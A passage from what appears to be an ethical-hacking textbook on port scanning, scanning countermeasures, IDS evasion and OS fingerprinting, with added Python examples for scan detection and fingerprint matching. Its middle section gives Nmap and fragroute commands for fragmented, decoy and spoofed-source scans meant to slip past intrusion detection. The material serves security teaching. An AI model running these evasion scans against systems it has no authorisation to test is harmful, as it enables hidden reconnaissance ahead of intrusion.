Unicornscan is a different tool from Nmap, not a replacement for it. Its strength is speed on large address ranges: because it has its own TCP/IP stack and does not wait for a reply before sending the next probe, it can sweep a whole /16 (more than 65,000 IP addresses) for a service such as HTTP in a fraction of the time a stateful scanner needs. Nmap remains the better tool for a detailed examination of a single host. Unicornscan runs on Linux; install it on Debian-based systems with [apt-get install unicornscan].

The two default scans below were run against the same host. The first found only smtp and the second found three open ports, a reminder that a fast stateless scan can lose replies and that a negative result should be confirmed with a second run:

:/# unicornscan 173.194.44.84
TCP open                     smtp[   25]         from 173.194.44.84  ttl 52

:/# unicornscan 173.194.44.84
TCP open                     smtp[   25]         from 173.194.44.84  ttl 52
TCP open                     http[   80]         from 173.194.44.84  ttl 45
TCP open                    https[  443]         from 173.194.44.84  ttl 45
:/#
OTHER SCANNING TOOLS

PRTG Network Monitor available at http://www.paessler.com
Net Tools available at http://mabsoft.com
IP Tools available at http://www.ks-soft.net
MegaPing available at http://www.magnetosoft.com
Network Inventory Explorer available at http://www.10-strike.com
Global Network Inventory Scanner available at http://www.magnetosoft.com
SoftPerfect Network Scanner available at http://www.softperfect.com
Advanced Port Scanner available at http://www.radmin.com
Netifera available at http://netifera.com
Free Port Scanner available at http://www.nsauditor.com

DO NOT SCAN THESE IP ADDRESSES

The ranges below belong to US military, NASA and other government organisations. Do not scan them during practice; unauthorised scanning of these networks is treated as an attack. Entries whose address or name could not be read in the source are marked [illegible].

RANGE 128
128.37.0.0 Army Yuma Proving Ground
128.38.0.0 Naval Surface Warfare Center
128.43.0.0 Defence Research Establishment-Ottawa
128.47.0.0 Army Communications Electronics Command
128.49.0.0 Naval Ocean Systems Center
128.50.0.0 Department of Defense
128.51.0.0 Department of Defense
128.56.0.0 U.S. Naval Academy
128.60.0.0 Naval Research Laboratory
128.63.0.0 Army Ballistics Research Laboratory
128.80.0.0 Army Communications Electronics Command
128.102.0.0 NASA Ames Research Center
128.149.0.0 NASA Headquarters
128.154.0.0 NASA Wallops Flight Facility
128.155.0.0 NASA Langley Research Center
128.156.0.0 NASA Lewis Network Control Center
128.157.0.0 NASA Johnson Space Center
128.158.0.0 NASA Ames Research Center
128.159.0.0 NASA Ames Research Center
128.160.0.0 Naval Research Laboratory
128.161.0.0 NASA Ames Research Center
128.183.0.0 NASA Goddard Space Flight Center
128.202.0.0 50th Space Wing
128.216.0.0 MacDill Air Force Base
128.217.0.0 NASA Kennedy Space Center
128.236.0.0 U.S. Air Force Academy

RANGE 129
129.23.0.0 Strategic Defense Initiative Organization
129.29.0.0 United States Military Academy
129.50.0.0 NASA Marshall Space Flight Center
129.51.0.0 Patrick Air Force Base
129.52.0.0 Wright-Patterson Air Force Base
129.53.0.0 - 129.53.255.255 [illegible]
129.54.0.0 Vandenberg Air Force Base, CA
129.92.0.0 Air Force Institute of Technology
129.99.0.0 NASA Ames Research Center
129.131.0.0 Naval Weapons Center
129.163.0.0 NASA/Johnson Space Center
129.164.0.0 NASA IVV
129.165.0.0 NASA Goddard Space Flight Center
129.167.0.0 NASA Marshall Space Flight Center
129.168.0.0 NASA Lewis Research Center
129.190.0.0 Naval Underwater Systems Center
129.198.0.0 Air Force Flight Test Center
129.209.0.0 Army Ballistics Research Laboratory
129.229.0.0 US Army Corps of Engineers
129.251.0.0 United States Air Force Academy

RANGE 130
130.40.0.0 NASA Johnson Space Center
130.90.0.0 Mather Air Force Base
130.109.0.0 Naval Coastal Systems Center
130.15[illegible].0.0 Honeywell Defense Systems Group
130.165.0.0 U.S. Army Corps of Engineers
130.167.0.0 NASA Headquarters

RANGE 131
131.6.0.0 [illegible] Air Force Base
131.10.0.0 Barksdale Air Force Base
131.17.0.0 Sheppard Air Force Base
131.21.0.0 Hahn Air Base
131.32.0.0 [illegible] Comm
131.35.0.0 Fairchild Air Force Base
131.36.0.0 Yokota Air Base
131.37.0.0 Elmendorf Air Force Base
131.38.0.0 Hickam Air Force Base
131.39.0.0 354CS/SCSN

RANGE 132
132.3.0.0 Williams Air Force Base
132.5.0.0 - 132.5.255.255 49th Fighter Wing
132.6.0.0 Ankara Air Station
132.7.0.0 - 132.7.255.255 SSG/SINO
132.9.0.0 28th Bomb Wing
132.10.0.0 313 Comm Sq
132.11.0.0 Hellenikon Air Base
132.12.0.0 Myrtle Beach Air Force Base
132.13.0.0 Bentwaters Royal Air Force Base
132.14.0.0 Air Force Concentrator Network
132.15.0.0 Kadena Air Base
132.16.0.0 Kunsan Air Base
132.17.0.0 Lindsey Air Station
132.18.0.0 McGuire Air Force Base
132.19.0.0 100CS (NET-MILDENHALL)
132.20.0.0 35th Communications Squadron
132.21.0.0 Plattsburgh Air Force Base
132.22.0.0 23 Communications Sq
132.24.0.0 Dover Air Force Base
132.25.0.0 7[illegible] CS/SCBM
132.27.0.0 - 132.27.255.255 83CS/SCBSN
132.28.0.0 14TH COMMUNICATION SQUADRON
132.30.0.0 [illegible] Air Force Base
132.31.0.0 [illegible] Air Force Base
132.33.0.0 60CS/SCSNM
132.34.0.0 Cannon Air Force Base
132.35.0.0 Altus Air Force Base
132.37.0.0 75 ABW
132.38.0.0 Goodfellow AFB
132.39.0.0 K. I. Sawyer Air Force Base

For a complete list, see the file on the DVD: IP ADDRESSES YOU SHOULD NOT SCAN.txt


PORT SCANNING COUNTERMEASURES (defending against port scanning)

As the previous sections showed, port scanning reveals a great deal about a target: which hosts are up, which ports and services are open, the operating system, and more. The following measures reduce what an attacker can learn:

- Configure the firewall and the intrusion detection system (IDS) to detect and block the probes that port scanners send. The firewall should detect probes sent by scanning tools, and it should not be possible to fingerprint the firewall itself with those tools.
- Use a stateful firewall. A firewall that filters only on addresses and ports (a packet filter) can be mapped with SYN, ACK and FIN scans; a stateful firewall that tracks connections drops the out-of-state probes (the FIN scan and the other inverse scans described above).
- Run a network intrusion detection system (NIDS) to detect the OS fingerprinting and scanning methods used by tools such as Nmap. Snort (http://www.snort.org) is a good choice: it is free, widely used, and its rules are updated frequently.
- Keep only the ports you need open; every other port and service should be closed or removed, because each open service is a possible way in.
- Filter the ICMP messages leaving your network (port unreachable and the other ICMP error messages) on the firewall and routers; many scanning techniques depend on them.
- Block source-routed packets and probes that arrive from specific source ports (such as 53 or 20) that attackers use to sneak past filters, and confirm that the firewall cannot be bypassed by either.
- Test your own perimeter: scan your IP ranges with TCP, UDP and ICMP scans to see which ports and services are actually exposed to the Internet.
- If a commercial firewall is in use, make sure it has the latest patches, enable its anti-spoofing rules, and do not rely on "fast mode" or similar features that skip the inspection of part of the traffic.
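The NIDS countermeasure above comes down to two checks that are easy to state: one source touching many distinct ports of one host in a short time, and probe packets whose flag combination never begins a legitimate TCP exchange. The Python below is an added example, not from the original text and not Snort's logic: it runs both checks over constructed packet records (the addresses, ports and times are made up), reporting a port sweep once per source/destination pair and every FIN-only, XMAS or NULL probe it sees.

```python
"""A minimal port-scan detector over connection records.

Added example, not from the original text and not Snort's logic. It runs two of the
checks a NIDS applies to the scans discussed in this chapter over constructed packet
records: a source that sends SYNs to many distinct ports of one host inside a short
window (a port sweep), and probe packets whose flag combination never starts a
legitimate TCP exchange (FIN-only, XMAS, NULL). The records are made up for the example.
"""
from collections import defaultdict, deque

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def is_inverse_flag_probe(flags):
    """FIN-only, XMAS (FIN|PSH|URG) and NULL segments are never the first packet of a
    real connection; seeing one at all is worth an alert."""
    return flags in (FIN, FIN | PSH | URG, 0)


def detect_scans(packets, window=10.0, port_threshold=15):
    """packets: iterable of dicts with keys t (seconds), src, dst, dport, flags.
    Returns a list of (alert_type, (src, dst), detail, time) tuples."""
    alerts = []
    recent = defaultdict(deque)          # (src, dst) -> deque of (t, dport) for SYNs
    sweeps_reported = set()
    for pkt in sorted(packets, key=lambda p: p["t"]):
        key = (pkt["src"], pkt["dst"])
        if is_inverse_flag_probe(pkt["flags"]):
            alerts.append(("inverse-flag-probe", key, pkt["dport"], pkt["t"]))
            continue
        if pkt["flags"] != SYN:
            continue                     # only connection attempts count for a sweep
        q = recent[key]
        q.append((pkt["t"], pkt["dport"]))
        while q and q[0][0] < pkt["t"] - window:
            q.popleft()                  # slide the window
        distinct_ports = {dport for _, dport in q}
        if len(distinct_ports) >= port_threshold and key not in sweeps_reported:
            sweeps_reported.add(key)
            alerts.append(("port-sweep", key, len(distinct_ports), pkt["t"]))
    return alerts


def sample_packets():
    """Constructed traffic: a normal client, a sequential scanner, and one XMAS probe."""
    pkts = []
    for i in range(10):                                   # normal client: only 80 and 443
        pkts.append({"t": float(i), "src": "10.0.0.5", "dst": "10.0.2.100",
                     "dport": 80 if i % 2 else 443, "flags": SYN})
    for i in range(20):                                   # scanner: ports 1..20 in 2 seconds
        pkts.append({"t": 1.0 + 0.1 * i, "src": "10.0.0.66", "dst": "10.0.2.100",
                     "dport": i + 1, "flags": SYN})
    pkts.append({"t": 5.0, "src": "10.0.0.66", "dst": "10.0.2.100",
                 "dport": 22, "flags": FIN | PSH | URG})  # XMAS probe
    return pkts


if __name__ == "__main__":
    for alert in detect_scans(sample_packets()):
        print(alert)
```

The threshold and window are the tuning knobs: a scanner using the slow Nmap timing templates (-T0, -T1) spreads its probes over minutes, so a ten-second window with fifteen ports misses it; a longer window catches it at the cost of more memory per source and more false positives from busy clients.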



3.4 SCANNING BEYOND IDS

IDS stands for Intrusion Detection System: a device or program that watches the traffic on the network for known attack patterns, such as the probes described above, and raises an alert. This section covers the techniques attackers use to scan without triggering it.

IDS EVASION TECHNIQUES
- Use fragmented IP packets (fragmented probe packets), so that no single packet carries a complete probe for the IDS to recognise.
- Spoof the source address or hide among decoys (spoofed fake hosts), so that the IDS cannot tell which address is really scanning the network.
- Use source routing, where the network still allows it.

Use fragmented IP packets
The attacker splits the probe into several small IP fragments. Many IDS sensors cannot, or do not, reassemble fragments before matching their signatures, so each fragment is examined on its own and the pattern is never seen. The same idea applied at the TCP layer is called session splicing: the data of one request is spread over many small TCP segments. The fragroute tool (described below) splits, delays, duplicates and reorders packets on their way to the target; Nmap does the same with its -f option. An IDS that reassembles fragments and tracks TCP sessions before inspection still sees the probe, so the technique only works against sensors that do not.

Use source routing
With source routing the sender specifies, in the IP options, the path the packet takes to its destination; the packet can then be steered around the link on which the IDS sits, and the reply can be made to come back the same way. Most routers and firewalls today drop source-routed packets, so this rarely works any more.

SYN/FIN SCANNING USING IP FRAGMENTS
SYN/FIN scanning using IP fragments is not a new scanning method but a modification of the earlier ones: the probe packet is fragmented. The idea follows from the way packet filters and IDSs were built. They take their decision from the first fragment, because that is where the TCP header, and therefore the port numbers and flags, are expected. If the attacker splits the TCP header itself into several small fragments, the first fragment carries only the source and destination ports and part of the sequence number; the flags (SYN, FIN and the rest live in byte 13 of the TCP header, i.e. in the second 8-byte fragment) arrive separately, and a filter that decides on the first fragment alone lets the probe through.

Fragmented packets
The TCP header is divided over several IP packets, each with its own IP header, so that a packet filter never sees enough of the TCP header in one packet to apply its rules; some implementations also handle such tiny fragments badly and crash or dump core. Note that the IP header itself is never fragmented; only the IP payload is split.

Firewall
Packet filters that queue and reassemble the fragments before filtering are not fooled. On Linux the kernel option CONFIG_IP_ALWAYS_DEFRAG (and, on later kernels, the connection-tracking code) reassembles every fragmented datagram before it reaches the packet filter, so the complete IP/TCP headers are inspected. The cost is that the firewall has to hold the fragments in memory until the datagram is complete, which is one reason some filters simply drop tiny fragments outright.


[Figure: SYN/FIN scanning. The attacker sends a SYN/FIN probe, split into small IP fragments, to port n of the target; a RST reply means the port is closed, no reply means it is open or filtered.]

Nmap performs a fragmented scan with the -f option:

#nmap -sS -A -f 192.168.168.5

Here -f tells Nmap to send its probes as tiny fragmented IP packets (8 bytes of payload per fragment, so the TCP header is spread over three fragments), -sS selects a SYN scan and -A adds OS and version detection. Note that -sS sends plain SYN probes; a true SYN/FIN probe needs custom flags (--scanflags SYNFIN). Whether the target (or the IDS in front of it) reassembles fragments before inspecting them decides whether the scan is noticed.
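To make the mechanism concrete, here is an added example (not from the book and not Nmap's code) that builds a SYN/FIN TCP probe in memory, splits it into 8-byte IP fragments the way `nmap -f` does, and shows both what a filter that inspects one fragment at a time can see and what a host that reassembles first (CONFIG_IP_ALWAYS_DEFRAG) sees. Nothing is sent on the wire; the addresses, ports and the fragment sizes are constructed for the example.

```python
# Added example (not from the book): build a SYN/FIN TCP probe, split it into
# tiny IP fragments the way "nmap -f" does, and show why a filter that only
# looks at one fragment never sees the TCP flags, while a host that reassembles
# first (CONFIG_IP_ALWAYS_DEFRAG) sees the whole header.  The packets are built
# in memory only; nothing is sent.  Addresses and ports are constructed.
import socket
import struct

SYN, FIN = 0x02, 0x01
TCP_FLAGS_OFFSET = 13          # the flags byte is byte 13 of the TCP header
IP_MF = 1 << 13                # "More Fragments" bit in the IP flags/offset word


def checksum(data: bytes) -> int:
    """Standard Internet (one's complement) checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def tcp_header(sport: int, dport: int, flags: int, seq: int = 0, window: int = 1024) -> bytes:
    """20-byte TCP header without options.  The TCP checksum is left at 0
    because this header is never transmitted."""
    data_offset = 5 << 4       # 5 words = 20 bytes, upper nibble of byte 12
    return struct.pack("!HHIIBBHHH", sport, dport, seq, 0, data_offset, flags, window, 0, 0)


def ipv4_header(src: str, dst: str, payload_len: int, ident: int, flags_frag: int,
                proto: int = 6, ttl: int = 64) -> bytes:
    """IPv4 header with a correct header checksum (bytes 10-11)."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident, flags_frag,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def fragment(src: str, dst: str, ident: int, payload: bytes, frag_size: int = 8) -> list:
    """Split payload into IP fragments of frag_size bytes.  frag_size must be a
    multiple of 8 because the fragment-offset field counts 8-byte units; nmap -f
    uses 8, so a 20-byte TCP header becomes three fragments."""
    if frag_size % 8:
        raise ValueError("fragment size must be a multiple of 8")
    frags = []
    for off in range(0, len(payload), frag_size):
        chunk = payload[off:off + frag_size]
        more = off + frag_size < len(payload)
        flags_frag = (IP_MF if more else 0) | (off // 8)
        frags.append(ipv4_header(src, dst, len(chunk), ident, flags_frag) + chunk)
    return frags


def flags_visible_in_fragment(frag: bytes):
    """What a filter inspecting one fragment in isolation can learn: the TCP
    flags byte if it falls inside this fragment, otherwise None."""
    flags_frag = struct.unpack("!H", frag[6:8])[0]
    offset = (flags_frag & 0x1FFF) * 8
    payload = frag[20:]
    idx = TCP_FLAGS_OFFSET - offset
    return payload[idx] if 0 <= idx < len(payload) else None


def reassemble(frags: list) -> bytes:
    """What CONFIG_IP_ALWAYS_DEFRAG does before filtering: put the datagram
    back together from the fragment offsets (all fragments share the IP ID)."""
    pieces = []
    for frag in frags:
        flags_frag = struct.unpack("!H", frag[6:8])[0]
        pieces.append(((flags_frag & 0x1FFF) * 8, frag[20:]))
    pieces.sort()
    return b"".join(chunk for _, chunk in pieces)


if __name__ == "__main__":
    probe = tcp_header(40000, 80, SYN | FIN)
    frags = fragment("10.0.0.5", "192.168.1.10", 0x1234, probe)
    print(len(frags), "fragments; flags visible in first fragment:",
          flags_visible_in_fragment(frags[0]))
    print("flags after reassembly:", hex(reassemble(frags)[TCP_FLAGS_OFFSET]))
```

With 8-byte fragments the first fragment holds only the two port numbers and the sequence number; the flags byte is in the second fragment, so a filter whose rule is "drop SYN to port 80 from outside" and which decides on the first fragment passes it. After reassembly the flags are back at byte 13 and the same rule fires. The header checksums are computed so that the fragments would also be accepted by a real stack.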



fragroute is one of the best known tools for this: it intercepts, modifies and rewrites the egress traffic destined for a specified host, so a scan run from the same machine reaches the target as fragments, out-of-order segments, duplicates and overlapping pieces, and the IDS in between can be tested for how well it copes with TCP/IP ambiguity.

Usage: [fragroute [-f file] host]

The -f file option makes fragroute read its ruleset from the given file instead of the default configuration file [/etc/fragroute.conf]. The configuration file lists the transformations applied to the packets, in order; the available rules and their parameters are described in the manual page (man fragroute).

fragrouter is a different and older program: it is a network intrusion detection evasion toolkit that works as a router, forwarding the packets it receives to the target while applying a chosen attack to them. IP forwarding (IP_Forward) must therefore be disabled on the host running it, otherwise the kernel forwards the original packets itself. Its attacks implement the insertion and evasion techniques (IP fragmentation, overlapping fragments, TCP segmentation and so on) from the original research on eluding network intrusion detection.

Usage: [fragrouter [option] ATTACK]

The options and the list of ATTACK names are in the manual page (man fragrouter).

CLOAK A SCAN WITH DECOYS

In this type of scan the attacker hides the real scanning host among decoy addresses: the target and its IDS see the same probes arriving from several IP addresses at once and cannot tell which of them is the real source. To find out, the administrator has to examine each address, which may include the real addresses of other hosts and routers on the Internet, so the scan is hard to attribute. Typically five to ten decoys are used.

With Nmap this is done with the -D option followed by a comma-separated list of decoy addresses. ME in the list stands for the real address of the scanning host and sets its position among the decoys (placing it late in the list helps, since some detectors report only the first few sources); RND:n generates n random decoys. The decoy hosts should be up, or the target may be flooded with SYN packets that no host ever acknowledges. The target itself is given after the decoy list, as with any other scan:

#nmap -sS -O -D 192.168.168.5,192.168.16.1,192.168.168.20,192.168.16.30,ME target



SPOOF SOURCE ADDRESS

The -S option makes Nmap send its probes with a forged source IP address, so the target's logs show the spoofed address instead of the attacker's. The replies go to the spoofed address, not back to the scanner, so Nmap learns nothing from the scan itself; the option is used to hide the origin or to make the scan appear to come from another host. Because Nmap can no longer discover the route automatically, -S normally has to be combined with -e to name the interface to send on, and with -Pn to skip host discovery, which would otherwise wait for ping replies that never arrive.



BANNER GRABBING

So far we have found the live hosts, the open ports and services, and ways past the firewalls and IDS; all of this prepares the next step of the attack. Banner grabbing, also called OS fingerprinting, is the method of determining the operating system running on the target host. It matters because the vulnerabilities that exist, and the exploits that work, depend on the operating system and its version.

Banner grabbing in the narrow sense means connecting to a service such as FTP and reading the banner (the greeting) it sends on connection, or making the remote service run a binary such as /bin/ls and identifying the OS from the format of what comes back. Beyond banners, fingerprinting relies on stack querying techniques, which send specific packets to the target and analyse the answers:

1. The first, TCP stack querying (stack query), sends a series of TCP packets to the target and analyses the responses, for example how the stack chooses its Initial Sequence Number (ISN).
2. The second uses ICMP: it sends crafted ICMP packets and analyses the responses (ICMP response analysis), since stacks differ in the ICMP messages they return.
3. The third, temporal response analysis, measures timing behaviour such as the TCP retransmission timeout (RTO).

In each case the collected data is compared against a database of signatures for known operating systems. There are two types of fingerprinting:

- Active OS Fingerprinting (active banner grabbing) sends probes to the target and analyses the responses, or their absence. It is accurate but noisy: the probes are visible to the target and its IDS and leave traces in the logs.
- Passive OS Fingerprinting (passive banner grabbing) sends nothing; it sniffs packets the target transmits, for example its FTP traffic, and infers the OS from the structure of those packets.

Active OS Fingerprinting (Active Banner Grabbing)

Active banner grabbing sends specially crafted TCP packets to the target and notes how it responds. This works because every TCP/IP stack implements the standards slightly differently; those differences form a signature that is compared against a database of known stacks. The best known tools are Nmap and Xprobe2. Active banner grabbing gives the most accurate result but is easily detected.

With Nmap, OS fingerprinting (banner grabbing) works by sending a series of tests, T1 to T7 and PU (port unreachable), and checking each response. The tests of Nmap's classic (first-generation) OS detection are described as follows (from www.packetwatch.net):

1. The first test, T1, sends a TCP packet with the SYN and ECN-Echo flags set to an open TCP port.
2. The second test, T2, sends a TCP packet with no flags set (a NULL packet) to an open TCP port.
3. The third test, T3, sends a TCP packet with the URG, PSH, SYN and FIN flags set to an open TCP port.
4. The fourth test, T4, sends a TCP packet with the ACK flag set to an open TCP port.
5. The fifth test, T5, sends a TCP packet with the SYN flag set to a closed TCP port.
6. The sixth test, T6, sends a TCP packet with the ACK flag set to a closed TCP port.
7. The seventh test, T7, sends a TCP packet with the URG, PSH and FIN flags set to a closed TCP port.
8. The PU (Port Unreachable) test sends a UDP packet to a closed UDP port; the aim is to examine the ICMP port unreachable message that comes back.

The last and most important test is TSeq (TCP sequenceability test), which examines three things:
1. The TCP Initial Sequence Numbers the target chooses, known as TCP ISN sampling.
2. The IP Identification numbers (IP ID) it uses, known as IPID sampling.
3. The TCP timestamp option values (TCP time stamp number).

This test sends six TCP SYN packets to an open TCP port and examines the sequence of answers. Nmap compares the results of all tests against its database; if no entry matches it reports "No exact matches for host".

The ISN test works because stacks pick sequence numbers in recognisably different ways: the traditional 64K increment (many old UNIX boxes), random positive increments (newer versions of Solaris, IRIX, FreeBSD, Digital UNIX, Cray and others), true random ISNs (Linux 2.0.*, OpenVMS, newer AIX and so on), and the time-dependent model of Windows, where the ISN is incremented by a small fixed amount in each time period.

The IPID test works because many stacks increment a system-wide IP ID for every packet sent, while OpenBSD uses random IP IDs and some stacks send IPID=0 on packets that carry the DF bit, as recent Linux kernels do. The timestamp test works because the TCP timestamp counter runs at a rate that depends on the OS: 2 Hz, 100 Hz or 1000 Hz, and some stacks do not support the option at all, which shows up as 0.
Passive OS Fingerprinting (Passive Banner Grabbing)

Reference: http://honeynet.org

Passive banner grabbing also relies on the differences between TCP/IP stack implementations, but instead of sending packets to the target it sniffs the traffic the target itself generates (for example at the edge of a network you control, or from a honeypot the target connects to) and reads the stack's signature from those packets. Four fields of the IP and TCP headers are used:

- TTL (time to live): the initial value the sending stack puts in outgoing packets, minus the hops travelled.
- Window size: the TCP window the stack advertises.
- DF: whether the Don't Fragment bit is set.
- TOS: the Type of Service field.

Passive fingerprinting is not foolproof and must not rely on one field alone; the combination of the four, compared with a database of signatures, gives a probable match. The example below, from the passive fingerprinting paper at (http://old.honeynet.org/papers/finger/), shows one sniffed packet and what the four criteria reveal:

04/20-21:41:48.129552 129.142.224.3:559 -> 172.16.1.107:604
TCP TTL:45 TOS:0x0 ID:56257 DF
***F**A* Seq: 0x9DD90553  Ack: 0xE3C65D7  Win: 0x7D78

Based on our 4 criteria, we identify the following:

• TTL: 45

• Window Size: 0x7D78 (or 32120 in decimal)

• DF: The Don't Fragment bit is set

• TOS: 0x0
Database Signatures (the signature database)

# Lists of fingerprints for passive fingerprint monitoring.
# Updated 23 May, 2000
# Mail your signatures to Lance Spitzner <lance@spitzner.net>
#
# OS            VERSION      PLATFORM          TTL   WINDOW        DF   TOS
DC-OSx          1.1-95       Pyramid/NILE       30   8192          n    0
Windows         9x/NT        Intel              32   5000-9000     y    0
NetApp          OnTap        5.1.2-5.2.2        54   8760          n    0
HPJetDirect     ?            HP_Printer         59   2100-2150     n    0
AIX             4.3.x        IBM/RS6000         60   16000-16100   y    0
AIX             4.2.x        IBM/RS6000         60   16000-16100   n    0
Cisco           11.2         7507               60   65535         y    0
DigitalUnix     4.0          Alpha              60   33580         y    16
IRIX            6.3C         SGI                60   61320         y    16
OS390           2.6          IBM/S390           60   32756         n    0
Reliant         5.43         Pyramid/RM1000     60   65534         n    0
FreeBSD         3.x          Intel              64   17520         y    16
JetDirect       G.07.x       J3113A             64   5804-5840     n    0
Linux           2.2.x        Intel              64   32120         y    0
OpenBSD         2.x          Intel              64   17520         n    16
OS/400          R4.4         AS/400             64   8192          y    0
SCO             R5           Compaq             64   24620         n    0
Solaris         8            Intel/Sparc        64   24820         y    0
FTX (UNIX)      3.3          STRATUS            64   32768         n    0
Unisys          x            Mainframe          64   32768         n    0
Netware         4.11         Intel             128   32000-32768   y    0
Windows         9x/NT        Intel             128   5000-9000     y    0
Windows         2000         Intel             128   17000-18000   y    0
Cisco           12.0         2514              255   3800-5000     n    192
Solaris         2.x          Intel/Sparc       255   8760          y    0

TTL (time to live). The TTL of the sniffed packet is 45. Stacks start from a handful of initial values (32, 60, 64, 128, 255), so we assume the packet left its sender with a TTL of 64 and passed through 19 hops to reach us (64 - 45 = 19). An initial TTL of 64 already narrows the sender down to systems that use it, such as Linux and FreeBSD. The hop count can be checked with traceroute, but a traceroute to the target is not stealthy, since it sends packets to the host; instead run it only to the last upstream hop before the target, or accept the estimate. The estimate can be wrong if the path is asymmetric or unusually long, and it is meaningless if the host is more than 30 hops away.

Window size. The window size is the second indicator: 0x7D78, 32120 in decimal, is the window Linux 2.2.x uses, while FreeBSD and Solaris advertise different values in the table. The window size is usually a better indicator than the TTL because it stays fixed for the whole session and is set by the TCP implementation, not by the path.

DF and TOS (session based). The Don't Fragment bit is set, which rules out the stacks that do not set it (SCO and OpenBSD in the table). TOS is 0x0, but the TOS field is session-based rather than operating-system-based, so on its own it says little about the OS. Combining all four criteria against the signature database gives a Linux 2.2.x system.

So we have two approaches: active fingerprinting, where tools such as Nmap, hunt and nemesis send packets to the target and analyse the responses, and passive fingerprinting, which uses only the TTL, window size, DF and TOS of packets that are sniffed on the wire. Passive fingerprinting is stealthy: it never sends anything to the target, so the attacker can use it on any sniffer trace they obtain, and there is nothing for the target's IDS to detect. It can also identify a remote proxy or firewall, since packets rewritten by such a device carry the device's signature instead of the original host's, and an IDS can apply it to the hosts that connect to it to build up knowledge of the remote systems (a honeypot is a natural place to do this). Organisations can use passive fingerprinting the same way to find unauthorised systems on their own network.
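The matching step described above, written out as an added example that is not part of the honeynet paper or the book: it pulls TTL, window, DF and TOS out of a Snort-style trace and looks them up in a subset of the signature list. The rows in `SIGNATURES` are copied from the table above; the regular expressions, the hop-count bound and the sample traces are this example's own assumptions.

```python
# Added example (not from the honeynet paper or the book): a passive fingerprint
# matcher that extracts TTL, window, DF and TOS from a Snort-style trace and
# looks them up in a subset of the signature list above.  The SIGNATURES rows
# are copied from that list; the regexes, the max_hops bound and the sample
# traces are this example's own assumptions.
import re

# (os, version, platform, initial TTL, (window_lo, window_hi), DF set, TOS)
SIGNATURES = [
    ("Windows", "9x/NT", "Intel", 32, (5000, 9000), True, 0),
    ("FreeBSD", "3.x", "Intel", 64, (17520, 17520), True, 16),
    ("Linux", "2.2.x", "Intel", 64, (32120, 32120), True, 0),
    ("OpenBSD", "2.x", "Intel", 64, (17520, 17520), False, 16),
    ("Solaris", "8", "Intel/Sparc", 64, (24820, 24820), True, 0),
    ("Windows", "2000", "Intel", 128, (17000, 18000), True, 0),
    ("Cisco", "12.0", "2514", 255, (3800, 5000), False, 192),
    ("Solaris", "2.x", "Intel/Sparc", 255, (8760, 8760), True, 0),
]

# Constructed trace in the same format as the honeynet example above.
SAMPLE_TRACE = """\
04/20-21:41:48.129552 129.142.224.3:559 -> 172.16.1.107:604
TCP TTL:45 TOS:0x0 ID:56257 DF
***F**A* Seq: 0x9DD90553  Ack: 0xE3C65D7  Win: 0x7D78
"""


def parse_trace(trace: str) -> dict:
    """Extract the four passive-fingerprinting fields from a Snort-style trace.
    DF is printed by Snort as a bare 'DF' token after the IP ID when set."""
    ttl = int(re.search(r"TTL:(\d+)", trace).group(1))
    tos = int(re.search(r"TOS:0x([0-9A-Fa-f]+)", trace).group(1), 16)
    win = int(re.search(r"Win:\s*0x([0-9A-Fa-f]+)", trace).group(1), 16)
    df = re.search(r"\bDF\b", trace) is not None
    return {"ttl": ttl, "tos": tos, "win": win, "df": df}


def match(fields: dict, max_hops: int = 30) -> list:
    """Return [(description, hops)] for every signature consistent with the
    fields.  Instead of rounding the TTL up to one initial value, every initial
    TTL within max_hops above the observed one is tried, so a NetApp-style 54
    and a Linux-style 64 are both candidates and the window/DF/TOS decide."""
    hits = []
    for os_, ver, plat, ttl0, (lo, hi), df, tos in SIGNATURES:
        hops = ttl0 - fields["ttl"]
        if not 0 <= hops <= max_hops:
            continue
        if not lo <= fields["win"] <= hi:
            continue
        if df != fields["df"] or tos != fields["tos"]:
            continue
        hits.append((f"{os_} {ver} ({plat})", hops))
    return hits


if __name__ == "__main__":
    fields = parse_trace(SAMPLE_TRACE)
    print(fields)
    for description, hops in match(fields):
        print(f"{description}, about {hops} hops away")
```

On the sample trace the only consistent signature is Linux 2.2.x at 19 hops, which is the conclusion reached by hand above. The TOS check is deliberately kept even though TOS is session-based; drop it from `match` if the sniffed session is known to use a non-zero TOS, at the cost of more candidates.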



BANNER GRABBING TOOLS

Banner grabbing does not need a dedicated tool (telnet and netcat are enough, as shown later), but several tools automate it. The following are some of them:

ID SERVE

ID Serve (Gibson Research Corporation, "Internet Server Identification Utility" v1.02, personal security freeware by Steve Gibson) queries a web server and reports the identification string the server returns. It also works with other text-based protocols, such as FTP, SMTP, POP and NEWS.

[Screenshot: ID Serve, "Background" tab. The program's description reads: "Ultimately, the security of your personal information is YOUR responsibility. The Internet is not a safe place. Just one look at tasteless junk mail, Outlook viruses du jour, and uninvited pop-up advertising windows should convince anyone that the Internet, circa 2002, remains a wild frontier. No one doubts that 'the Net' has tremendous promise, but many frequent Internet users remain justifiably cautious about extending trust beyond their own keyboards. Since confidence and trust is gained through knowledge and understanding, I am working to empower end users with accurate information and simple tools designed to demystify what lies beyond their computers."]

[Screenshot: ID Serve, "Server Query" tab. (1) Enter or copy/paste an Internet server URL or IP address (example: www.microsoft.com); (2) press "Query The Server" to initiate a query of the specified server; (3) "Server query processing" log; (4) "The server identified itself as".]

Enter the target, here http://www.certifiedhacker.com/, in field (1) and press Query The Server (2). The server query processing log (3) shows:

Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 27 Mar 2014 04:12:17 GMT
Connection: close
Query complete.

and field (4), "The server identified itself as", shows: Microsoft-IIS/6.0
AMAP TOOL
Source: https://www.thc.org

Amap identifies the application behind an open port by sending protocol triggers to it and matching the responses, so it recognises a service even when it runs on a non-standard port. To build it from the source archive:

tar -xzf amap-5.4.tar.gz
# cd amap-5.4

then run ./configure followed by make. A single port is queried with [amap www.certifiedhacker.com 80]:

:/amap-5.4# amap www.certifiedhacker.com 80
amap v5.4 (www.thc.org/thc-amap) started at 2014-03-27 00:46:06 - APPLICATION MAPPING mode

Protocol on 202.75.54.101:80/tcp matches http
